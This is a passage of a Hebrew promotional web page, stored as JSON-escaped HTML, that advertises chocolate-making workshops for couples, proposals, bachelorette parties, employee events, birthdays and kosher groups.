\\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea.<\\/p><p>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd.<br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h2><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4.<br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h2><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 \\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea \\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h2><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd.<br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd.<\\/p><p>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8.<br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd 